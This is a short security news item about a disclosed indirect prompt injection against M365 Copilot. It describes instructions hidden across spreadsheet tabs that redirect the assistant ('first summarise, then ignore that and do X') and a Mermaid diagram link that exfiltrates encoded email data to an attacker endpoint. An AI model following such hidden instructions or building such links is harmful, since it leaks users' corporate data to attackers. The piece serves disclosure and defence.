The bigger threat of indirect prompt injection: The incident underscores that the risk goes beyond simple “prompt injection,” where a user types malicious instructions directly into an AI. Here, the attacker hides instructions inside document content that gets passed into the assistant without the user’s awareness. Logue described how the hidden instructions use progressive task modification (e.g, “first summarise, then ignore that and do X”) layered across spreadsheet tabs.Additionally, the disclosure exposes a new attack surface where the diagram-generation feature (Mermaid output) becomes the exfiltration channel. Logue explained that clicking the diagram opened a browser link that quietly sent the encoded email data to an attacker-controlled endpoint. The transfer happened through a standard web request, making it indistinguishable from a legitimate click-through in many environments.”One of the interesting things about mermaid diagrams is that they also include support for CSS,” Logue noted. “This opens up some interesting attack vectors for data exfiltration, as M365 Copilot can generate a mermaid diagram on the fly and can include data retrieved from other tools in the diagram.”Recent disclosures highlight a surge in indirect prompt injection attacks, where hidden macros in documents or embedded comments in pull requests hijack AI-driven workflows and extract data without obvious user action. These trends underscore that tools like diagram generators or visual outputs can soon become stealthy channels for exfiltration.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4080154/copilot-diagrams-could-leak-corporate-emails-via-indirect-prompt-injection.html
![]()

